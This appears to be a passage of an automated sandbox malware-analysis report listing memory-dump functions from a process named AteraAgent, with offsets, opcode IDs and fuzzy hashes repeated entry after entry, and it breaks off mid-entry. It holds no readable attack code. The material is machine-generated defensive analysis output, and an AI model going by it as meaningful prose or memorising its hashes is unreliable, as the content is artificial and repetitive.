                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ac4cce6c1c12c9e4f59db9da9581628378cd27163dc3a37030b6e60bd8ff834
                                                                                                                                                                                                                                          • Instruction ID: b2a0f1452d3e564cf0320576bb8377c4d2e188a850952b3b638c1d8991ab8b67
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ac4cce6c1c12c9e4f59db9da9581628378cd27163dc3a37030b6e60bd8ff834
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511A562B0FD4D1FE7E585ED2CB617436C2EB9860871600FAE44CC72B7DD65AD019241
                                                                                                                                                                                                                                          Function 00007FFD9B41A01F Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a297b2b16eae8c425f3ef3116cc5652cfc63782c402f647a793f9466e79316c0
                                                                                                                                                                                                                                          • Instruction ID: 751233ba75d78ca0cdf2858540aba21fe33641f02ddfd00f56955edb835c0caa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a297b2b16eae8c425f3ef3116cc5652cfc63782c402f647a793f9466e79316c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41115E70509B489FE778EF28C85DBB777E5EBA9311F01452E948DC3261EF3068418782
                                                                                                                                                                                                                                          Function 00007FFD9B41D965 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cdd35040a1878308e0b397d99588a2c30f2d30c0126c903a0584c08d5273ec7e
                                                                                                                                                                                                                                          • Instruction ID: 2e88e5a65af3aa1e2e790d2bef7b344116b00b7cf45642af1bfb085fb8c1838c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdd35040a1878308e0b397d99588a2c30f2d30c0126c903a0584c08d5273ec7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE115EB190F7C45FD3069B288C649517FF0AF6721570A42EFD088CF1B3CA299946C722
                                                                                                                                                                                                                                          Function 00007FFD9B4240A8 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9aabd272597ba2b657617a080dbda55df88e47946f5a3f526a53ebb08e787d02
                                                                                                                                                                                                                                          • Instruction ID: 5aa9cd32e3153fbaf390ee0397be77541529723a73d421b3eb803755a938f2da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aabd272597ba2b657617a080dbda55df88e47946f5a3f526a53ebb08e787d02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90012D43F0FD894FF6A895ED68F91F55790DFA423430902BBD049C71A7EC041E469391
                                                                                                                                                                                                                                          Function 00007FFD9B41A670 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 64b56f851501b7eabb73f1b7b4c6c31d1db36aeaf6db0859054c12ced70187ce
                                                                                                                                                                                                                                          • Instruction ID: a9630b2c591073989467eaae70b7f896366d195ac8567527cc6432f08e9c552c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64b56f851501b7eabb73f1b7b4c6c31d1db36aeaf6db0859054c12ced70187ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D01D131F0990D0FDBA4EA9CA85567633C2EBA8368F01127BE40CC32A6ED25E8018381
                                                                                                                                                                                                                                          Function 00007FFD9B428413 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e631312ec3b0a6657feaa3ae3ab7454c4146067f98f6eaa364ae460132ad2cc9
                                                                                                                                                                                                                                          • Instruction ID: a11113878831775e1d90182b609304354583862cc915fffd6f411774864ffdf0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e631312ec3b0a6657feaa3ae3ab7454c4146067f98f6eaa364ae460132ad2cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45018132B0D81C8FEAD8EA5CA895A7473D2EFA922431505E6D44DC7662E911EC429741
                                                                                                                                                                                                                                          Function 00007FFD9B41A0F3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aba088cbe68f331fff1faeb981ef9f3facd42244fa1d24295f9711228e756d02
                                                                                                                                                                                                                                          • Instruction ID: 2676c88b775363e9d07cdc7aa94636fd00cb080d3d66142ba6405d959ffbbfc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aba088cbe68f331fff1faeb981ef9f3facd42244fa1d24295f9711228e756d02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D014532F1A60C5FFB649F6C88AA5F97BA1FF90214F0011B7C468871A2DE201A458700
                                                                                                                                                                                                                                          Function 00007FFD9B4279B1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6c1062b4646335933889716a0ba54ea54838593d497c0e735c1a30d5317bfd07
                                                                                                                                                                                                                                          • Instruction ID: 40e6a9132c5cee3eb10573d5c8a89b8889769f91b5d16ac9861320b8abf18a60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c1062b4646335933889716a0ba54ea54838593d497c0e735c1a30d5317bfd07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0E02271D58C0FE754A55CAC5D9723FD4DB6A23531601FFE448C7173E9469C029355
                                                                                                                                                                                                                                          Function 00007FFD9B42C765 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 011262a3b573b38824f6049f7275c6d43d30c2552c5de501e96d5a2ae6c029ef
                                                                                                                                                                                                                                          • Instruction ID: a2ed69ef46c5812e87b3af2f68e68bbee4326c630f6be9cfb2ce39e1d266b3ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 011262a3b573b38824f6049f7275c6d43d30c2552c5de501e96d5a2ae6c029ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B01F220A1DA490FE398D65884A93B5B7D1EFA9704B5900FAC408C72F7DE1AAC408301
                                                                                                                                                                                                                                          Function 00007FFD9B41BF80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ea9c9d79dd3154459021855666c8acafc35dbcd09ab21feedd30aba665ea5350
                                                                                                                                                                                                                                          • Instruction ID: 050837eb35159c96920242d3379a512091611bf6c78e62934059501e884102a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea9c9d79dd3154459021855666c8acafc35dbcd09ab21feedd30aba665ea5350
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0018631F29D4E4FDBA8EB1C94649B6B3E1FFA8304744567AD019C3299EE24E9418741
                                                                                                                                                                                                                                          Function 00007FFD9B41AE30 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7951f14a982ef478d9b1f9651b95a2e07a362146eb89bace3ea258f52e7fd891
                                                                                                                                                                                                                                          • Instruction ID: 57793754e203654d9755eb2d55a182310b8e0ec435ac942b3ae7e8f4f86fd04e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7951f14a982ef478d9b1f9651b95a2e07a362146eb89bace3ea258f52e7fd891
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB01D631F25E4F0BDBA9EB2C80A0ABAB3D1FFA43047551679D41DC31D9EE24E8418380
                                                                                                                                                                                                                                          Function 00007FFD9B42ECED Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9877d94240cb015a5d095dc5414d0329fed609b0f29fff06544af0ee1958f2a4
                                                                                                                                                                                                                                          • Instruction ID: 62ce285019f39cb60ec1a1987cbf75b7eeee25317153861d0c1e22da9c661b62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9877d94240cb015a5d095dc5414d0329fed609b0f29fff06544af0ee1958f2a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F07831D1E6CC5FE711DBA898295E9BFB0EF82200F0A42F7D848C7173DE282A018780
                                                                                                                                                                                                                                          Function 00007FFD9B62C7CE Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 48760c2fa1a075d8e1d6a3d0562970aa2c17e3d0ab690125a7315a1271ec4f7f
                                                                                                                                                                                                                                          • Instruction ID: 7db34b3051a16e54f4db5f7b5158dc84a0638ad6793dae660dd32622c36151e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48760c2fa1a075d8e1d6a3d0562970aa2c17e3d0ab690125a7315a1271ec4f7f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF05EA3F5E95E0AF6AC679C34624FDA392EBC467074543BBE05EC21DBED4A79030184
                                                                                                                                                                                                                                          Function 00007FFD9B423230 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8941b0d11486e66c730eddbd69cb84dbd726e1ae022dd021503fec0e62a87859
                                                                                                                                                                                                                                          • Instruction ID: dee37b91a0b938ca5db20b70022a53fa86316b189ed0038ecf5290851623ba81
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8941b0d11486e66c730eddbd69cb84dbd726e1ae022dd021503fec0e62a87859
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101B530A09B084FE7A4EB689058A6A7BE1EFD4314F04093EE889D7374DA34E541D781
                                                                                                                                                                                                                                          Function 00007FFD9B42D17D Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f7d88e14334f7f15415702f8031617207c9fe431f05e24932dd9cbc3fd66b08b
                                                                                                                                                                                                                                          • Instruction ID: 0957971e22595c183db38f088c1a58a9a98f459897c27af39b9b24ff236125a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7d88e14334f7f15415702f8031617207c9fe431f05e24932dd9cbc3fd66b08b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57018605A5F7CA1EE76363F81C741B12FA59E4712870E01E7E0C8C64A7D80C5A56D396
                                                                                                                                                                                                                                          Function 00007FFD9B414228 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a0e848970d6f4ec48b3c63d1c307aae33990dff61208c2ebbb082aa7268f8243
                                                                                                                                                                                                                                          • Instruction ID: b2e8e968d369d1e6d836e051f13c6261038065a555ede83c7ca1bb3488a97365
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0e848970d6f4ec48b3c63d1c307aae33990dff61208c2ebbb082aa7268f8243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF09031D4951D8BEB20AED0E4403F9F7B4EB53388F05203AD40CA7150D77A9A91DB89
                                                                                                                                                                                                                                          Function 00007FFD9B414DC8 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9ba80afa309c701ff17962b5b0001008804c0735db6d1b36daf8395c36c5c8ff
                                                                                                                                                                                                                                          • Instruction ID: d794cdd6de59f4f08075e3805a515ab399ca772ed4c171fc1daa3c87b0c8e54f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ba80afa309c701ff17962b5b0001008804c0735db6d1b36daf8395c36c5c8ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB010830E1551D4FEBA4EB58D860BA8B7B2FF55304F5051BAD05DE3295CE756C828B40
                                                                                                                                                                                                                                          Function 00007FFD9B419CF0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7c19d0b91370eb04fc96d2aa4d4da1cac961b39bca6a103826f6e89abb00addb
                                                                                                                                                                                                                                          • Instruction ID: 8596f4d2f414221b9629cb57e1ab62afa9536a14e287d2234666d2e8dc443840
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c19d0b91370eb04fc96d2aa4d4da1cac961b39bca6a103826f6e89abb00addb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F02812F0EAA90FE729B67DACAA4D4BBD0EB8112470562B7C044C61D3D84466864281
                                                                                                                                                                                                                                          Function 00007FFD9B414B89 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a4a6465439daba30f6b56c220e74ae06748e93a58a0de4a51d217a48fabf89fb
                                                                                                                                                                                                                                          • Instruction ID: 4d6f87e80301b98ee49a409585be90a3cd3f849eced4e5e7c4898b716f9dc9a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a6465439daba30f6b56c220e74ae06748e93a58a0de4a51d217a48fabf89fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B012671D0E68C5FE751AB6888652E87FB0EF16214F4602F6C048C70B3EA391A448741
                                                                                                                                                                                                                                          Function 00007FFD9B41AF99 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3eb30f2e149f68440ea7cc9de2b9c29ab022ff91cee95393342fac18b34ac1d3
                                                                                                                                                                                                                                          • Instruction ID: 9630fa3819935359e9230671d3f3bdfdc804c6c9b23b1179781ea09aad03f4ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eb30f2e149f68440ea7cc9de2b9c29ab022ff91cee95393342fac18b34ac1d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B601DC30E1AB8E8FDB46EF6888641FD7FF0FF69200B0005BBD468C72A2DA7459148300
                                                                                                                                                                                                                                          Function 00007FFD9B42C3D8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c66b4a7503104b9252df0147ce5ee9bd874589f85c8182c188fa9f4f3fa1ffd5
                                                                                                                                                                                                                                          • Instruction ID: fdc20398b6c45381846993a9e3feca905831db4e09c7bc1a2fe36780a9695df5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c66b4a7503104b9252df0147ce5ee9bd874589f85c8182c188fa9f4f3fa1ffd5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F0F030B2880D0FE398E65C84A87B6B3D1EF98319F6400B9D40CC72F6CE1A6C809240
                                                                                                                                                                                                                                          Function 00007FFD9B424121 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cb4f5505ee4a3a360ad88d939395a2b0ea62b6e1e6deab240703d4a76cfed937
                                                                                                                                                                                                                                          • Instruction ID: 97924cbeb95611e2b741bd9892c07f56066e8ff89cb1d9079c9cc61d74f3f8d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb4f5505ee4a3a360ad88d939395a2b0ea62b6e1e6deab240703d4a76cfed937
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEF04C6254E6CD0FEB718AA884653F13BA0FF52310F0001F7D08CC7193ED241A05D780
                                                                                                                                                                                                                                          Function 00007FFD9B4125AB Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 322d71052aad946a1107abb70704700446d21811ce303391c1b3cd2615faba60
                                                                                                                                                                                                                                          • Instruction ID: 0be7e1245a4144598a9ad76eee704593ff46418f4fa68050fac6616fa5384e1e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 322d71052aad946a1107abb70704700446d21811ce303391c1b3cd2615faba60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601DA71E1851D8EEBA4EB6898997E9B3A1EF98304F1012E6D00DE2191DE346D81DF41
                                                                                                                                                                                                                                          Function 00007FFD9B420B02 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: daccaf779c126b5cbb7023cda3265ba7c008199f31e122727d7fabc54b22b5da
